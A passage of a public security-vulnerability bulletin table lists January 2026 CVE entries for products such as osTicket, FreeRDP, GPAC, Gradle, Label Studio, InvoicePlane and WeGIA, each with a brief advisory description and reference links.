| Enhancesoft--osTicket | Enhancesoft osTicket versions 1.18.3 contain an arbitrary file read vulnerability in the ticket PDF export functionality. A remote attacker can submit a ticket containing crafted rich-text HTML that includes PHP filter expressions which are insufficiently sanitized before being processed by the mPDF PDF generator during export. When the attacker exports the ticket to PDF, the generated PDF can embed the contents of attacker-selected files from the server filesystem as bitmap images, allowing disclosure of sensitive local files in the context of the osTicket application user. This issue is exploitable in default configurations where guests may create tickets and access ticket status, or where self-registration is enabled. | 2026-01-12 | not yet calculated | CVE-2026-22200 | https://github.com/osTicket/osTicket/releases/tag/v1.18.3 https://github.com/osTicket/osTicket/commit/c59b067 https://www.vulncheck.com/advisories/osticket-pdf-export-arbitrary-file-read |
| Entrust Corporation--Instant Financial Issuance (IF) | Entrust Instant Financial Issuance (IFI) On Premise software (formerly referred to as CardWizard) versions 5.x, prior to 6.10.5, and prior to 6.11.1 contain an insecure .NET Remoting exposure in the SmartCardController service (DCG.SmartCardControllerService.exe). The service registers a TCP remoting channel with unsafe formatter/settings that permit untrusted remoting object invocation. A remote, unauthenticated attacker who can reach the remoting port can invoke exposed remoting objects to read arbitrary files from the server and coerce outbound authentication, and may achieve arbitrary file write and remote code execution via known .NET Remoting exploitation techniques. This can lead to disclosure of sensitive installation and service-account data and compromise of the affected host. | 2026-01-15 | not yet calculated | CVE-2026-23746 | https://www.entrust.com/products/issuance-systems/instant/financial-card https://trustedcare.entrust.com/s/article/E26-001-NET-Remoting-Vulnerabilities-in-the-Smart-Card-Controller-Service-of-the-Instant-Financial-Issuance-On-Premise-Software https://www.vulncheck.com/advisories/entrust-ifi-smartcardcontroller-service-net-remoting-rce |
| Eptura Archibuss--Eptura Archibus | In Eptura Archibus 2024.03.01.109, the "Run script" and "Server File" components of the "Database Update Wizard" are vulnerable to directory traversal. | 2026-01-13 | not yet calculated | CVE-2025-25652 | https://eptura.com/our-platform/archibus/ https://packetstorm.news/files/id/213675 |
| Eramba-Eramba | A CORS misconfiguration in Eramba Community and Enterprise Editions v3.26.0 allows an attacker-controlled Origin header to be reflected in the Access-Control-Allow-Origin response along with Access-Control-Allow-Credentials: true. This permits malicious third-party websites to perform authenticated cross-origin requests against the Eramba API, including endpoints like /system-api/login and /system-api/user/me. The response includes sensitive user session data (ID, name, email, access groups), which is accessible to the attacker's JavaScript. This flaw enables full session hijack and data exfiltration without user interaction. Eramba versions 3.23.3 and earlier were tested and appear unaffected. The vulnerability is present in default installations, requiring no custom configuration. | 2026-01-13 | not yet calculated | CVE-2025-55462 | http://eramba.com https://discussions.eramba.org/t/release-3-28-0/7860 |
| esm-dev--esm.sh | esm.sh is a no-build content delivery network (CDN) for web development. Prior to Go pseeudoversion 0.0.0-20260116051925-c62ab83c589e, the software has a path traversal vulnerability due to an incomplete fix. `path.Clean` normalizes a path but does not prevent absolute paths in a malicious tar file. Commit https://github.com/esm-dev/esm.sh/commit/9d77b88c320733ff6689d938d85d246a3af9af16, corresponding to pseudoversion 0.0.0-20260116051925-c62ab83c589e, fixes this issue. | 2026-01-18 | not yet calculated | CVE-2026-23644 | https://github.com/esm-dev/esm.sh/security/advisories/GHSA-2657-3c98-63jq https://github.com/esm-dev/esm.sh/commit/9d77b88c320733ff6689d938d85d246a3af9af16 https://github.com/esm-dev/esm.sh/commit/c62ab83c589e7b421a0e1376d2a00a4e48161093 https://pkg.go.dev/vuln/GO-2025-4138 |
| ethereum--go-ethereum | go-ethereum (geth) is a golang execution layer implementation of the Ethereum protocol. A vulnerable node can be forced to shutdown/crash using a specially crafted message. This vulnerability is fixed in 1.16.8. | 2026-01-13 | not yet calculated | CVE-2026-22862 | https://github.com/ethereum/go-ethereum/security/advisories/GHSA-mr7q-c9w9-wh4h https://github.com/ethereum/go-ethereum/commit/abeb78c647e354ed922726a1d719ac7bc64a07e2 |
| ethereum--go-ethereum | go-ethereum (geth) is a golang execution layer implementation of the Ethereum protocol. A vulnerable node can be forced to shutdown/crash using a specially crafted message. This vulnerability is fixed in 1.16.8. | 2026-01-13 | not yet calculated | CVE-2026-22868 | https://github.com/ethereum/go-ethereum/security/advisories/GHSA-mq3p-rrmp-79jg https://github.com/ethereum/go-ethereum/commit/abeb78c647e354ed922726a1d719ac7bc64a07e2 |
| Flare Camera--Blurams | A vulnerability in the boot process of Blurams Flare Camera version 24.1114.151.929 and earlier allows a physically proximate attacker to hijack the boot mechanism and gain a bootloader shell via the UART interface. This is achieved by inducing a read error from the SPI flash memory during the boot, by shorting a data pin of the IC to ground. An attacker can then dump the entire firmware, leading to the disclosure of sensitive information including cryptographic keys and user configurations. | 2026-01-14 | not yet calculated | CVE-2025-65396 | http://blurams.com http://flare.com https://lessonsec.com/cve/cve-2025-65396/ |
| Flare Camera--Blurams | An insecure authentication mechanism in the safe_exec.sh startup script of Blurams Flare Camera version 24.1114.151.929 and earlier allows an attacker with physical access to the device to execute arbitrary commands with root privileges, if file /opt/images/public_key.der is not present in the file system. The vulnerability can be triggered by providing a maliciously crafted auth.ini file on the device's SD card. | 2026-01-14 | not yet calculated | CVE-2025-65397 | http://blurams.com http://flare.com https://lessonsec.com/cve/cve-2025-65397/ |
| flipped-aurora--gin-vue-admin | Gin-vue-admin is a backstage management system based on vue and gin. Gin-vue-admin <= v2.8.7 has a path traversal vulnerability in the breakpoint resume upload functionality. Attacker can upload any files on any directory. In the breakpoint_continue.go file, the MakeFile function accepts a fileName parameter through the /fileUploadAndDownload/breakpointContinueFinish API endpoint and directly concatenates it with the base directory path (./fileDir/) using os.OpenFile() without any validation for directory traversal sequences (e.g., ../). An attacker with file upload privileges could exploit this vulnerability. | 2026-01-12 | not yet calculated | CVE-2026-22786 | https://github.com/flipped-aurora/gin-vue-admin/security/advisories/GHSA-3558-j79f-vvm6 https://github.com/flipped-aurora/gin-vue-admin/commit/2242f5d6e133e96d1b359ac019bf54fa0e975dd5 |
| frappe--lms | Frappe Learning Management System (LMS) is a learning system that helps users structure their content. In 2.44.0 and earlier, there is a stored XSS vulnerability where a specially crafted image filename could execute malicious JavaScript when rendered on course or jobs pages. | 2026-01-14 | not yet calculated | CVE-2026-23497 | https://github.com/frappe/lms/security/advisories/GHSA-78mq-3whw-69j5 https://github.com/frappe/lms/commit/e7ccf0a711d0e0ab5e6b28b7a1e4e0510b6b9543 |
| FreeImage--FreeImage | FreeImage 3.18.0 contains a Use After Free in PluginTARGA.cpp;loadRLE(). | 2026-01-14 | not yet calculated | CVE-2025-70968 | https://github.com/MiracleWolf/FreeimageCrash/tree/main |
| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.20.1, a race condition between the RDPGFX dynamic virtual channel thread and the SDL render thread leads to a heap use-after-free. Specifically, an escaped pointer to sdl->primary (SDL_Surface) is accessed after it has been freed during RDPGFX ResetGraphics handling. This vulnerability is fixed in 3.20.1. | 2026-01-14 | not yet calculated | CVE-2026-22851 | https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-8g87-6pvc-wh99 https://github.com/FreeRDP/FreeRDP/releases/tag/3.20.1 |
| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.20.1, a malicious RDP server can trigger a heap-buffer-overflow write in the FreeRDP client when processing Audio Input (AUDIN) format lists. audin_process_formats reuses callback->formats_count across multiple MSG_SNDIN_FORMATS PDUs and writes past the newly allocated formats array, causing memory corruption and a crash. This vulnerability is fixed in 3.20.1. | 2026-01-14 | not yet calculated | CVE-2026-22852 | https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-9chc-g79v-4qq4 https://github.com/FreeRDP/FreeRDP/releases/tag/3.20.1 |
| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.20.1, RDPEAR's NDR array reader does not perform bounds checking on the on‑wire element count and can write past the heap buffer allocated from hints, causing a heap buffer overflow in ndr_read_uint8Array. This vulnerability is fixed in 3.20.1. | 2026-01-14 | not yet calculated | CVE-2026-22853 | https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-47v9-p4gp-w5ch https://github.com/FreeRDP/FreeRDP/releases/tag/3.20.1 |
| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.20.1, a heap-buffer-overflow occurs in drive read when a server-controlled read length is used to read file data into an IRP output stream buffer without a hard upper bound, allowing an oversized read to overwrite heap memory. This vulnerability is fixed in 3.20.1. | 2026-01-14 | not yet calculated | CVE-2026-22854 | https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-47vj-g3c3-3rmf https://github.com/FreeRDP/FreeRDP/releases/tag/3.20.1 |
| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.20.1, a heap out-of-bounds read occurs in the smartcard SetAttrib path when cbAttrLen does not match the actual NDR buffer length. This vulnerability is fixed in 3.20.1. | 2026-01-14 | not yet calculated | CVE-2026-22855 | https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-rwp3-g84r-6mx9 https://github.com/FreeRDP/FreeRDP/releases/tag/3.20.1 |
| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.20.1, a race in the serial channel IRP thread tracking allows a heap use‑after‑free when one thread removes an entry from serial->IrpThreads while another reads it. This vulnerability is fixed in 3.20.1. | 2026-01-14 | not yet calculated | CVE-2026-22856 | https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-w842-c386-fxhv https://github.com/FreeRDP/FreeRDP/releases/tag/3.20.1 |
| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.20.1, a heap use-after-free occurs in irp_thread_func because the IRP is freed by irp->Complete() and then accessed again on the error path. This vulnerability is fixed in 3.20.1. | 2026-01-14 | not yet calculated | CVE-2026-22857 | https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-4gxq-jhq6-4cr8 https://github.com/FreeRDP/FreeRDP/releases/tag/3.20.1 |
| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.20.1, global-buffer-overflow was observed in FreeRDP's Base64 decoding path. The root cause appears to be implementation-defined char signedness: on Arm/AArch64 builds, plain char is treated as unsigned, so the guard c <= 0 can be optimized into a simple c != 0 check. As a result, non-ASCII bytes (e.g., 0x80-0xFF) may bypass the intended range restriction and be used as an index into a global lookup table, causing out-of-bounds access. This vulnerability is fixed in 3.20.1. | 2026-01-14 | not yet calculated | CVE-2026-22858 | https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-qmqf-m84q-x896 https://github.com/FreeRDP/FreeRDP/releases/tag/3.20.1 |
| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.20.1, the URBDRC client does not perform bounds checking on server‑supplied MSUSB_INTERFACE_DESCRIPTOR values and uses them as indices in libusb_udev_complete_msconfig_setup, causing an out‑of‑bounds read. This vulnerability is fixed in 3.20.1. | 2026-01-14 | not yet calculated | CVE-2026-22859 | https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-56f5-76qv-2r36 https://github.com/FreeRDP/FreeRDP/releases/tag/3.20.1 |
| Google--Android | In key-based pairing, there is a possible ID due to a logic error in the code. This could lead to remote (proximal/adjacent) information disclosure of user's conversations and location with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-01-15 | not yet calculated | CVE-2025-36911 | https://source.android.com/security/bulletin/pixel/2026-01-01 |
| Google--Google Devices | In cpm_fwtp_msg_handler of cpm/google/lib/tracepoint/cpm_fwtp_ipc.c, there is a possible memory overwrite due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-01-16 | not yet calculated | CVE-2025-48647 | https://source.android.com/docs/security/bulletin/pixel/2026/2026-01-01 |
| Google--Keras | Allocation of Resources Without Limits or Throttling in the HDF5 weight loading component in Google Keras 3.0.0 through 3.13.0 on all platforms allows a remote attacker to cause a Denial of Service (DoS) through memory exhaustion and a crash of the Python interpreter via a crafted .keras archive containing a valid model.weights.h5 file whose dataset declares an extremely large shape. | 2026-01-15 | not yet calculated | CVE-2026-0897 | https://github.com/keras-team/keras/pull/21880 |
| GPAC--GPAC | GPAC v2.4.0 was discovered to contain an out-of-bounds read in the oggdmx_parse_tags function. | 2026-01-15 | not yet calculated | CVE-2025-70298 | https://github.com/zakkanijia/POC/blob/main/dmx_ogg/GPAC_oggdmx_parse_tags_offbyone.md |
| GPAC--GPAC | A heap overflow in the avi_parse_input_file() function of GPAC v2.4.0 allows attackers to cause a Denial of Service (DoS) via a crafted AVI file. | 2026-01-15 | not yet calculated | CVE-2025-70299 | https://github.com/zakkanijia/POC/blob/main/gpac_avi/GPAC_AVI_indx_heap_overflow.md |
| GPAC--GPAC | A heap overflow in the ghi_dmx_declare_opid_bin() function of GPAC v2.4.0 allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2026-01-15 | not yet calculated | CVE-2025-70302 | https://github.com/zakkanijia/POC/blob/main/gpac_ghi/ghi.md |
| GPAC--GPAC | A heap overflow in the uncv_parse_config() function of GPAC v2.4.0 allows attackers to cause a Denial of Service (DoS) via a crafted MP4 file. | 2026-01-15 | not yet calculated | CVE-2025-70303 | https://github.com/zakkanijia/POC/blob/main/gpac_uncv/GPAC_UNCV_CPAT.md |
| GPAC--GPAC | A buffer overflow in the vobsub_get_subpic_duration() function of GPAC v2.4.0 allows attackers to cause a Denial of Service (DoS) via a crafted packet. | 2026-01-15 | not yet calculated | CVE-2025-70304 | https://github.com/zakkanijia/POC/blob/main/gpac_vobsub/GPAC_vobsub.md |
| GPAC--GPAC | A stack overflow in the dmx_saf function of GPAC v2.4.0 allows attackers to cause a Denial of Service (DoS) via a crafted .saf file. | 2026-01-15 | not yet calculated | CVE-2025-70305 | https://github.com/zakkanijia/POC/blob/main/gpac_saf/GPAC_SAF.md |
| GPAC--GPAC | A stack overflow in the dump_ttxt_sample function of GPAC v2.4.0 allows attackers to cause a Denial of Service (DoS) via a crafted packet. | 2026-01-15 | not yet calculated | CVE-2025-70307 | https://github.com/zakkanijia/POC/blob/main/gpac_boxDump/GPAC_tx3g.md |
| GPAC--GPAC | An out-of-bounds read in the GSF demuxer filter component of GPAC v2.4.0 allows attackers to cause a Denial of Service (DoS) via a crafted .gsf file. | 2026-01-15 | not yet calculated | CVE-2025-70308 | https://github.com/zakkanijia/POC/blob/main/gpac_gsf/GPAC_gsf.md |
| GPAC--GPAC | A stack overflow in the pcmreframe_flush_packet function of GPAC v2.4.0 allows attackers to cause a Denial of Service (DoS) via a crafted WAV file. | 2026-01-15 | not yet calculated | CVE-2025-70309 | https://github.com/zakkanijia/POC/blob/main/gpac_rawpcm/GPAC_RFPCM.md |
| GPAC--GPAC | A heap overflow in the vorbis_to_intern() function of GPAC v2.4.0 allows attackers to cause a Denial of Service (DoS) via a crafted .ogg file. | 2026-01-15 | not yet calculated | CVE-2025-70310 | https://github.com/zakkanijia/POC/blob/main/gpac_dec_vorbis/GPAC_VORBIS.md |
| gradle--gradle | Gradle is a build automation tool, and its native-platform tool provides Java bindings for native APIs. When resolving dependencies in versions before 9.3.0, some exceptions were not treated as fatal errors and would not cause a repository to be disabled. If a build encountered one of these exceptions, Gradle would continue to the next repository in the list and potentially resolve dependencies from a different repository. If a Gradle build used an unresolvable host name, Gradle would continue to work as long as all dependencies could be resolved from another repository. An unresolvable host name could be caused by allowing a repository's domain name registration to lapse or typo-ing the real domain name. This behavior could allow an attacker to register a service under the host name used by the build and serve malicious artifacts. The attack requires the repository to be listed before others in the build configuration. Gradle has introduced a change in behavior in Gradle 9.3.0 to stop searching other repositories when encountering these errors. | 2026-01-16 | not yet calculated | CVE-2026-22816 | https://github.com/gradle/gradle/security/advisories/GHSA-w78c-w6vf-rw82 https://github.com/gradle/gradle/commit/e5707d0d8fce3d768c9c489004700d78eab1773a |
| gradle--gradle | Gradle is a build automation tool, and its native-platform tool provides Java bindings for native APIs. When resolving dependencies in versions before 9.3.0, some exceptions were not treated as fatal errors and would not cause a repository to be disabled. If a build encountered one of these exceptions, Gradle would continue to the next repository in the list and potentially resolve dependencies from a different repository. An exception like NoHttpResponseException can indicate transient errors. If the errors persist after a maximum number of retries, Gradle would continue to the next repository. This behavior could allow an attacker to disrupt the service of a repository and leverage another repository to serve malicious artifacts. This attack requires the attacker to have control over a repository after the disrupted repository. Gradle has introduced a change in behavior in Gradle 9.3.0 to stop searching other repositories when encountering these errors. | 2026-01-16 | not yet calculated | CVE-2026-22865 | https://github.com/gradle/gradle/security/advisories/GHSA-mqwm-5m85-gmcv |
| graphql-hive--graphql-modules | GraphQL Modules is a toolset of libraries and guidelines dedicated to create reusable, maintainable, testable and extendable modules out of your GraphQL server. From 2.2.1 to before 2.4.1 and 3.1.1, when 2 or more parallel requests are made which trigger the same service, the context of the requests is mixed up in the service when the context is injected via @ExecutionContext(). ExecutionContext is often used to pass authentication tokens from incoming requests to services loading data from backend APIs. This vulnerability is fixed in 2.4.1 and 3.1.1. | 2026-01-16 | not yet calculated | CVE-2026-23735 | https://github.com/graphql-hive/graphql-modules/security/advisories/GHSA-53wg-r69p-v3r7 https://github.com/graphql-hive/graphql-modules/issues/2613 https://github.com/graphql-hive/graphql-modules/pull/2521 https://github.com/graphql-hive/graphql-modules/releases/tag/release-1768575025568 |
| Home Security System--D3D | D3D Wi-Fi Home Security System ZX-G12 v2.1.1 is vulnerable to RF replay attacks on the 433 MHz sensor communication channel. The system does not implement rolling codes, message authentication, or anti-replay protection, allowing an attacker within RF range to record valid alarm/control frames and replay them to trigger false alarms. | 2026-01-12 | not yet calculated | CVE-2025-65552 | http://d3d.com https://github.com/EmbdCDACHyd/CVE/tree/main/CVE-2025-65552 |
| Home Security System--D3D | D3D Wi-Fi Home Security System ZX-G12 v2.1.17 is susceptible to RF jamming on the 433 MHz alarm sensor channel. An attacker within RF range can transmit continuous interference to block sensor transmissions, resulting in missed alarms and loss of security monitoring. The device lacks jamming detection or mitigations, creating a denial-of-service condition that may lead to undetected intrusions or failure to trigger safety alerts. | 2026-01-12 | not yet calculated | CVE-2025-65553 | http://d3d.com https://github.com/EmbdCDACHyd/CVE/tree/main/CVE-2025-65553 |
| https://github.com/linrunner--TLP | A Improper Authentication vulnerability in TLP allows local users to arbitrarily control the power profile in use as well as the daemon's log settings.This issue affects TLP: from 1.9 before 1.9.1. | 2026-01-14 | not yet calculated | CVE-2025-67859 | https://security.opensuse.org/2026/01/07/tlp-polkit-authentication-bypass.html https://bugzilla.suse.com/show_bug.cgi?id=CVE-2025-67859 |
| https://github.com/ShadowBlip--inputplumber | Polkit authentication dis isabled by default and a race condition in the Polkit authorization check in versions before v0.69.0 can lead to the same issues as in CVE-2025-66005. | 2026-01-14 | not yet calculated | CVE-2025-14338 | https://bugzilla.suse.com/show_bug.cgi?id=CVE-2025-14338 https://security.opensuse.org/2026/01/09/inputplumber-lack-of-dbus-auth.html |
| https://github.com/ShadowBlip--inputplumber | Lack of authorization of the InputManager D-Bus interface in InputPlumber versions before v0.63.0 can lead to local Denial-of-Service, information leak or even privilege escalation in the context of the currently active user session. | 2026-01-14 | not yet calculated | CVE-2025-66005 | https://bugzilla.suse.com/show_bug.cgi?id=CVE-2025-66005 https://security.opensuse.org/2026/01/09/inputplumber-lack-of-dbus-auth.html |
| Hubert Imoveis--Hubert Imoveis | An arbitrary file upload vulnerability in the /utils/uploadFile component of Hubert Imoveis e Administracao Ltda Hub v2.0 1.27.3 allows attackers to execute arbitrary code via uploading a crafted PDF file. | 2026-01-13 | not yet calculated | CVE-2025-65783 | http://hub.com http://hubert.com https://github.com/carlos-artmann/vulnerability-research/tree/main/CVE-2025-65783 |
| Hubert Imoveis--Hubert Imoveis | Insecure permissions in Hubert Imoveis e Administracao Ltda Hub v2.0 1.27.3 allows authenticated attackers with low-level privileges to access other users' information via a crafted API request. | 2026-01-13 | not yet calculated | CVE-2025-65784 | http://hub.com http://hubert.com https://github.com/carlos-artmann/vulnerability-research/tree/main/CVE-2025-65784 |
| HumanSignal--label-studio | Label Studio is a multi-type data labeling and annotation tool. In 1.22.0 and earlier, a persistent stored cross-site scripting (XSS) vulnerability exists in the custom_hotkeys functionality of the application. An authenticated attacker (or one who can trick a user/administrator into updating their custom_hotkeys) can inject JavaScript code that executes in other users' browsers when those users load any page using the templates/base.html template. Because the application exposes an API token endpoint (/api/current-user/token) to the browser and lacks robust CSRF protection on some API endpoints, the injected script may fetch the victim's API token or call token reset endpoints - enabling full account takeover and unauthorized API access. | 2026-01-12 | not yet calculated | CVE-2026-22033 | https://github.com/HumanSignal/label-studio/security/advisories/GHSA-2mq9-hm29-8qch https://github.com/HumanSignal/label-studio/pull/9084 https://github.com/HumanSignal/label-studio/commit/ea2462bf042bbf370b79445d02a205fbe547b505 |
| Imagination Technologies--Graphics DDK | Software installed and run as a non-privileged user may conduct improper GPU system calls to cause mismanagement of reference counting to cause a potential use after free. Improper reference counting on an internal resource caused scenario where potential for use after free was present. | 2026-01-13 | not yet calculated | CVE-2025-10865 | https://www.imaginationtech.com/gpu-driver-vulnerabilities/ |
| Imagination Technologies--Graphics DDK | Intermediate register values of secure workloads can be exfiltrated in workloads scheduled from applications running in the non-secure environment of a platform. | 2026-01-13 | not yet calculated | CVE-2025-25176 | https://www.imaginationtech.com/gpu-driver-vulnerabilities/ |
| Imagination Technologies--Graphics DDK | Software installed and run as a non-privileged user may conduct improper GPU system calls to subvert GPU HW to write to arbitrary physical memory pages. Under certain circumstances this exploit could be used to corrupt data pages not allocated by the GPU driver but memory pages in use by the kernel and drivers running on the platform altering their behaviour. This attack can lead the GPU to perform write operations on restricted internal GPU buffers that can lead to a second order affect of corrupted arbitrary physical memory. | 2026-01-13 | not yet calculated | CVE-2025-58409 | https://www.imaginationtech.com/gpu-driver-vulnerabilities/ |
| Imagination Technologies--Graphics DDK | Software installed and run as a non-privileged user may conduct improper GPU system calls to cause mismanagement of resources reference counting creating a potential use after free scenario. Improper resource management and reference counting on an internal resource caused scenario where potential write use after free was present. | 2026-01-13 | not yet calculated | CVE-2025-58411 | https://www.imaginationtech.com/gpu-driver-vulnerabilities/ |
| Imaster--MEMS Events CRM | Imaster's MEMS Events CRM contains an SQL injection vulnerability in'keyword' parameter in '/memsdemo/exchange_offers.php'. | 2026-01-12 | not yet calculated | CVE-2025-41005 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-imaster-products |
| Imaster--MEMS Events CRM | Imaster's MEMS Events CRM contains an SQL injection vulnerability in 'phone' parameter in '/memsdemo/login.php'. | 2026-01-12 | not yet calculated | CVE-2025-41006 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-imaster-products |
| Imaster--Patient Record Management System | Imaster's Patient Record Management System contains a stored Cross-Site Scripting (XSS) vulnerability in the endpoint '/projects/hospital/admin/edit_patient.php'. By injecting a malicious script into the 'firstname' parameter, the JavaScript code is stored and executed every time a user accesses the patient list, allowing an attacker to execute arbitrary JavaScript in a victim's browser. | 2026-01-12 | not yet calculated | CVE-2025-41003 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-imaster-products |
| Imaster--Patient Record Management System | Imaster's Patient Records Management System is vulnerable to SQL Injection in the endpoint '/projects/hospital/admin/complaints.php' through the 'id' parameter. | 2026-01-12 | not yet calculated | CVE-2025-41004 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-imaster-products |
| InvoicePlane--InvoicePlane | An SQL injection vulnerability in InvoicePlane through 1.6.3 has been identified in "maxQuantity" and "minQuantity" parameters when generating a report. An authenticated attacker can exploit this issue via error-based SQL injection, allowing for the extraction of arbitrary data from the database. The vulnerability arises from insufficient sanitizing of single quotes. | 2026-01-15 | not yet calculated | CVE-2025-67082 | https://github.com/InvoicePlane/InvoicePlane https://www.helx.io/blog/advisory-invoice-plane/ |
| InvoicePlane--InvoicePlane | Directory traversal vulnerability in InvoicePlane through 1.6.3 allows unauthenticated attackers to read files from the server. The ability to read files and the file type depends on the web server and its configuration. | 2026-01-15 | not yet calculated | CVE-2025-67083 | https://github.com/InvoicePlane/InvoicePlane https://www.helx.io/blog/advisory-invoice-plane/ |
| InvoicePlane--InvoicePlane | File upload vulnerability in InvoicePlane through 1.6.3 allows authenticated attackers to upload arbitrary PHP files into attachments, which can later be executed remotely, leading to Remote Code Execution (RCE). | 2026-01-15 | not yet calculated | CVE-2025-67084 | https://github.com/InvoicePlane/InvoicePlane https://www.helx.io/blog/advisory-invoice-plane/ |
| ippprint--Sagemcom | Buffer Overflow in the ippprint (Internet Printing Protocol) service in Sagemcom F@st 3686 MAGYAR_4.121.0 allows remote attacker to execute arbitrary code by sending a crafted HTTP request. | 2026-01-12 | not yet calculated | CVE-2025-29329 | http://sagemcom.com http://fst.com https://github.com/SilverS3c/Sagemcom-fast-3686-ippprint |
| isaacs--node-tar | node-tar is a Tar for Node.js. The node-tar library (<= 7.5.2) fails to sanitize the linkpath of Link (hardlink) and SymbolicLink entries when preservePaths is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to Arbitrary File Overwrite via hardlinks and Symlink Poisoning via absolute symlink targets. This vulnerability is fixed in 7.5.3. | 2026-01-16 | not yet calculated | CVE-2026-23745 | https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97 https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e |
| Itflow--Itflow | An SQL injection vulnerability in Itflow through 25.06 has been identified in the "role_id" parameter when editing a profile. An attacker with admin account can exploit this issue via blind SQL injection, allowing for the extraction of arbitrary data from the database. The vulnerability arises from insufficient sanitizing on integer parameter. | 2026-01-15 | not yet calculated | CVE-2025-67081 | https://github.com/itflow-org/itflow https://www.helx.io/blog/advisory-itflow/ |
| KACE--KACE | Quest KACE Desktop Authority through 11.3.1 has Insecure Permissions on the Named Pipes used for inter-process communication | 2026-01-12 | not yet calculated | CVE-2025-67813 | https://quest.com https://support.quest.com/kb/4381743/quest-kace-desktop-authority-insecure-named-pipe-permissions-cve-2025-67813 |
| kashipara--kashipara | A SQL Injection was found in the /exam/user/profile.php page of kashipara Online Exam System V1.0, which allows remote attackers to execute arbitrary SQL command to get unauthorized database access via the rname, rcollage, rnumber, rgender and rpassword parameters in a POST HTTP request. | 2026-01-12 | not yet calculated | CVE-2025-51567 | https://github.com/0xBhushan/Writeups/blob/main/CVE/Kashipara/Online%20Exam%20System/SQL%20Injection-Profile%20Update.pdf |
| LabRedesCefetRJ--WeGIA | WeGIA is a web manager for charitable institutions. Prior to 3.6.2, a Stored Cross-Site Scripting (XSS) vulnerability was identified in the html/pet/adotantes/cadastro_adotante.php and html/pet/adotantes/informacao_adotantes.php endpoint of the WeGIA application. The application does not sanitize user-controlled input before rendering it inside the Adopters Information table, allowing persistent JavaScript injection. Any user who visits the page will have the payload executed automatically. This vulnerability is fixed in 3.6.2. | 2026-01-16 | not yet calculated | CVE-2026-23725 | https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-c85q-4fwg-99gw https://github.com/LabRedesCefetRJ/WeGIA/pull/1333 https://github.com/LabRedesCefetRJ/WeGIA/releases/tag/3.6.2 |
| LabRedesCefetRJ--WeGIA | WeGIA is a web manager for charitable institutions. Prior to 3.6.2, An Open Redirect vulnerability was identified in the /WeGIA/controle/control.php endpoint of the WeGIA application, specifically through the nextPage parameter when combined with metodo=listarTodos and nomeClasse=TipoEntradaControle. The application fails to validate or restrict the nextPage parameter, allowing attackers to redirect users to arbitrary external websites. This can be abused for phishing attacks, credential theft, malware distribution, and social engineering using the trusted WeGIA domain. This vulnerability is fixed in 3.6.2. | 2026-01-16 | not yet calculated | CVE-2026-23726 | https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-h7qx-j7g3-7fx3 https://github.com/LabRedesCefetRJ/WeGIA/pull/1333 https://github.com/LabRedesCefetRJ/WeGIA/releases/tag/3.6.2 |
| LabRedesCefetRJ--WeGIA | WeGIA is a web manager for charitable institutions. Prior to 3.6.2, an Open Redirect vulnerability was identified in the /WeGIA/controle/control.php endpoint of the WeGIA application, specifically through the nextPage parameter when combined with metodo=listarTodos and nomeClasse=TipoSaidaControle. The application fails to validate or restrict the nextPage parameter, allowing attackers to redirect users to arbitrary external websites. This can be abused for phishing attacks, credential theft, malware distribution, and social engineering using the trusted WeGIA domain. This vulnerability is fixed in 3.6.2. | 2026-01-16 | not yet calculated | CVE-2026-23727 | https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-pmq9-8p4w-m4f3 https://github.com/LabRedesCefetRJ/WeGIA/pull/1333 https://github.com/LabRedesCefetRJ/WeGIA/releases/tag/3.6.2 |
| LabRedesCefetRJ--WeGIA | WeGIA is a web manager for charitable institutions. Prior to 3.6.2, an Open Redirect vulnerability was identified in the /WeGIA/controle/control.php endpoint of the WeGIA application, specifically through the nextPage parameter when combined with metodo=listarTodos and nomeClasse=DestinoControle. The application fails to validate or restrict the nextPage parameter, allowing attackers to redirect users to arbitrary external websites. This can be abused for phishing attacks, credential theft, malware distribution, and social engineering using the trusted WeGIA domain. This vulnerability is fixed in 3.6.2. | 2026-01-16 | not yet calculated | CVE-2026-23728 | https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-jf25-p56f-wpgh https://github.com/LabRedesCefetRJ/WeGIA/pull/1333 https://github.com/LabRedesCefetRJ/WeGIA/releases/tag/3.6.2 |
